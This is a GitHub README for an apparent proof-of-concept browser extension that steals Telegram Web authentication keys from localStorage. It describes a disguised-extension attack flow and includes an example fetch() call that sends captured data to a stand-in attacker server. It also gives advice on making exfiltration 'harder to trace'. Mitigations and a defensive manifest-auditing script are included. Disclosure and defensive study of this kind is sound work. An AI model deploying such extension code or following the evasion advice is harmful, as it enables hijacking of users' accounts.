https://github.com/right-git/telegram-extension-vulneribility
Telegram localStorage Security Vulnerability Proof-of-Concept
- Host: GitHub
- URL: https://github.com/right-git/telegram-extension-vulneribility
- Owner: right-git
- Created: 2025-08-18T17:28:31.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2025-08-18T20:24:51.000Z (8 months ago)
- Last Synced: 2025-08-18T21:18:00.361Z (8 months ago)
- Topics: hacking-telegram, telegram, telegram-hack, telegram-vulneribility
- Language: JavaScript
- Homepage:
- Size: 31.3 KB
- Stars: 0
- Watchers: 0
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Telegram localStorage Security Vulnerability Proof-of-Concept
[Video demonstration](https://www.youtube.com/watch?v=HvfHwf79CzU)
## ⚠️ SECURITY RESEARCH DISCLOSURE
**This proof-of-concept is created for educational and security research purposes only. It demonstrates a critical security vulnerability that affects Telegram Web and potentially thousands of other web applications.**
## 🔍 Vulnerability Overview
### The Problem
Browser extensions have unrestricted access to `localStorage` data from any website without requiring explicit user permission. This creates a critical security vulnerability for web applications that store sensitive authentication data in browser localStorage.
### Impact on Telegram
Telegram Web (web.telegram.org) stores authentication tokens and session data in the browser's localStorage, making it vulnerable to data extraction by malicious browser extensions. This affects millions of Telegram users who use the web version.
## 🎯 Attack Vector Demonstration
This extension demonstrates how a malicious actor could:
1. **Distribute a seemingly innocent browser extension** (disguised as a productivity tool, ad blocker, etc.)
2. **Automatically detect when users visit Telegram Web**
3. **Extract authentication tokens from localStorage** without any user interaction
4. **Exfiltrate the stolen data** to attacker-controlled servers
5. **Gain complete account access** using the stolen authentication data
## 📋 Technical Details
### Authentication Data at Risk
The extension specifically targets these critical Telegram authentication keys:
- `dc1_auth_key` - Data Center 1 authentication key
- `dc2_auth_key` - Data Center 2 authentication key
- `dc3_auth_key` - Data Center 3 authentication key
- `dc4_auth_key` - Data Center 4 authentication key
### Attack Flow
```
User installs malicious extension →
Extension monitors for web.telegram.org →
User logs into Telegram Web →
Extension extracts localStorage data →
Data is exfiltrated to attacker's server →
Attacker gains account access
```
## 🔧 Proof-of-Concept Components
### File Structure
```
├── manifest.json # Extension configuration and permissions
├── background.js # Service worker for tab management
├── content.js # Main attack logic and data extraction
└── README.md # This documentation
```
## ⚠️ Implementation Considerations
### Data Exfiltration Method
**This proof-of-concept uses Telegram Bot API for demonstration purposes only.** In real-world attacks, this approach has significant security drawbacks:
#### Why Telegram is NOT Recommended for Real Attacks:
- **🚨 Exposes Bot Token** - Hardcoded bot tokens can be discovered through reverse engineering
- **🚨 Reveals Chat ID** - Links attacks to specific Telegram accounts
- **🚨 Telegram Monitoring** - Telegram may detect and block suspicious bot activity
- **🚨 Rate Limiting** - Telegram API has strict rate limits for file uploads
- **🚨 Forensic Evidence** - Leaves clear audit trails in Telegram's systems
#### Recommended Alternative: VPS Server Exfiltration
For educational understanding of real attack vectors, a more sophisticated approach would use:
```javascript
// Example: Secure VPS endpoint (NOT included in this PoC)
const exfiltrateToVPS = (data) => {
  fetch('https://attacker-vps.example.com/collect', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'X-Session': btoa(Date.now() + Math.random()), // Basic obfuscation
    },
    body: JSON.stringify({
      target: window.location.hostname,
      timestamp: Date.now(),
      data: data
    })
  });
};
```
#### Advantages of VPS Approach:
- ✅ **No hardcoded credentials** in extension code
- ✅ **Anonymous collection** without platform dependencies
- ✅ **Custom encryption** and obfuscation capabilities
- ✅ **No rate limits** or platform restrictions
- ✅ **Harder to trace** and investigate
- ✅ **Professional data organization** and victim management
**Note:** This information is provided for security research and defensive understanding only. The current Telegram-based implementation serves as an easily demonstrable proof-of-concept while maintaining ethical boundaries.
### Key Functions
#### `getAuthData()`
- Extracts all localStorage key-value pairs from the current domain
- Demonstrates unrestricted access to sensitive data
#### `sendMessage()`
- Simulates data exfiltration to attacker's endpoint
- Uses Telegram Bot API for demonstration purposes
- Shows how stolen data would be transmitted
#### Main Attack Loop
- Monitors Telegram Web activity every 5 seconds
- Waits for authentication keys to be present
- Prevents duplicate data extraction
- Automatically exfiltrates data when conditions are met
## 🚀 Installation & Testing
### Prerequisites
- Google Chrome or Chromium-based browser
- Developer mode enabled in Chrome extensions
### Setup Instructions
1. Clone or download this repository
2. Open Chrome and navigate to `chrome://extensions/`
3. Enable "Developer mode" in the top right
4. Click "Load unpacked" and select this directory
5. Navigate to https://web.telegram.org
6. Log into your Telegram account
7. Open browser console to see PoC logs
### Expected Behavior
- Extension automatically activates on Telegram Web
- Console logs show detection of authentication data
- Data extraction is demonstrated (sent to configured endpoint)
## 🎥 Video Demonstration
### Live Attack Demo
Watch the complete vulnerability demonstration on YouTube:
**🔗 [View Demo Video](https://www.youtube.com/watch?v=HvfHwf79CzU)**
⚠️ *The video demonstrates the attack for educational purposes only with proper disclaimers*
### What the Demo Shows:
- Real-time localStorage data extraction from Telegram Web
- Silent authentication token theft without user knowledge
- Complete attack flow from extension installation to data exfiltration
- Console logs showing each step of the vulnerability exploitation
## 📊 Vulnerability Assessment
### Severity: **CRITICAL**
**CVSS 3.1 Score: 9.6 (Critical)**
- **Attack Vector:** Network (AV:N)
- **Attack Complexity:** Low (AC:L)
- **Privileges Required:** None (PR:N)
- **User Interaction:** Required (UI:R) - Only to install extension
- **Scope:** Changed (S:C)
- **Confidentiality Impact:** High (C:H)
- **Integrity Impact:** High (I:H)
- **Availability Impact:** High (A:H)
### Why This is Critical
1. **No Additional Permissions Required** - Extensions can access localStorage without declaring special permissions
2. **Silent Attack** - Users have no indication their data is being extracted
3. **Persistent Access** - Once tokens are stolen, attacker maintains account access
4. **Wide Attack Surface** - Affects any user who installs malicious extensions
5. **Complete Account Compromise** - Stolen tokens provide full account access
## 🛡️ Recommended Mitigations
### For Telegram
1. **Move sensitive data to secure storage**
   - Implement secure HTTP-only cookies for web applications
2. **Implement token rotation**
   - Shorter-lived authentication tokens
   - Regular token refresh mechanisms
   - Session invalidation on suspicious activity
3. **Add integrity checks**
   - Detect unauthorized localStorage access
   - Implement client-side monitoring for data exfiltration
   - Alert users of potential compromise
### For Users
1. **Review extension permissions in manifest** before installation
2. **Only install extensions from trusted sources**
3. **Regularly audit installed extensions**
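To support the "review the manifest before installing" and "audit installed extensions" steps above, here is an added example (not part of this repository) in Node.js: it reports which match patterns in an extension manifest cover a host such as `web.telegram.org`, the condition under which a content script shares that page's localStorage. The `SAMPLE_MANIFEST` is constructed for illustration and is not the PoC's actual manifest.json.

```javascript
// Added example (not from the PoC repository): a Node.js manifest auditor that reports
// which match patterns cover hosts whose localStorage holds session material.

// Does a Chrome match pattern (<all_urls>, *://*/*, https://*.telegram.org/*,
// https://web.telegram.org/*) cover the given host?
function patternCoversHost(pattern, host) {
  if (pattern === '<all_urls>') return true;
  const m = /^(\*|https?|file|ftp):\/\/([^/]*)\/.*$/.exec(pattern);
  if (!m) return false;                       // not a valid match pattern
  const hostPart = m[2];
  if (hostPart === '*') return true;          // any host
  if (hostPart.startsWith('*.')) {            // *.telegram.org also covers telegram.org
    const suffix = hostPart.slice(2);
    return host === suffix || host.endsWith('.' + suffix);
  }
  return host === hostPart;
}

// Returns findings as strings; an empty array means no sensitive host is covered.
function auditManifest(manifest, sensitiveHosts) {
  const findings = [];
  // MV2 puts match patterns in "permissions", MV3 in "host_permissions".
  const perms = [].concat(manifest.permissions || [], manifest.host_permissions || []);
  const hostGrants = perms.filter((p) => p === '<all_urls>' || p.includes('://'));
  const canInject = perms.includes('scripting'); // chrome.scripting.executeScript
  for (const host of sensitiveHosts) {
    for (const cs of manifest.content_scripts || []) {
      if ((cs.matches || []).some((p) => patternCoversHost(p, host))) {
        findings.push(`content script [${(cs.js || []).join(', ')}] runs on ${host} and shares its localStorage`);
      }
    }
    const covering = hostGrants.filter((p) => patternCoversHost(p, host));
    if (canInject && covering.length > 0) {
      findings.push(`"scripting" plus host grant ${covering[0]} allows injecting code into ${host}`);
    }
  }
  return findings;
}

// Constructed sample manifest shaped like the PoC's described layout (a content
// script on Telegram Web); it is not the repository's actual manifest.json.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'Productivity Helper',
  permissions: ['tabs'],
  host_permissions: ['https://web.telegram.org/*'],
  content_scripts: [{ matches: ['https://web.telegram.org/*'], js: ['content.js'] }],
};

console.log(auditManifest(SAMPLE_MANIFEST, ['web.telegram.org']));
```

Run it against the manifest.json of any unpacked extension; a finding for a host you log into from that browser is the case this PoC demonstrates.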
### For Browser Vendors
1. **Require explicit permission** for localStorage access in extensions
2. **Implement localStorage access logging** for transparency
3. **Add user controls** for localStorage sharing with extensions
4. **Develop APIs** for secure extension-to-page communication
## 📝 Responsible Disclosure
This vulnerability has been:
- ✅ Reported by email to Telegram's bug bounty program and to the Google Chrome bug bounty program
- ✅ Identified through legitimate security research
- ✅ Documented with proof-of-concept code
- ✅ Prepared for responsible disclosure to Telegram
- ✅ Created for educational purposes only
## ⚖️ Legal & Ethical Considerations
### Disclaimer
- This code is for **educational and research purposes only**
- **Do not use** this code for malicious activities
- **Do not target** unauthorized accounts or systems
- The author assumes **no responsibility** for misuse of this code
### Research Ethics
This research follows responsible disclosure principles:
- No real user data was compromised during research
- No unauthorized access was attempted
- Code is shared to raise awareness and improve security
- Telegram will be notified through proper security channels
## 📧 Contact & Follow
### Security Research Updates
For the latest security research and vulnerability disclosures:
**📱 Telegram Channel: [Right Decision IT](https://t.me/right_decision_it)**
### Contact Information
For questions about this security research or responsible disclosure:
- **Security Research Purpose Only**
- **No malicious use intended**
- **Educational demonstration only**
Follow my security research for more vulnerability disclosures and educational content!
---
**⚠️ Remember: This tool demonstrates a serious security vulnerability. Use responsibly and only for legitimate security research purposes.**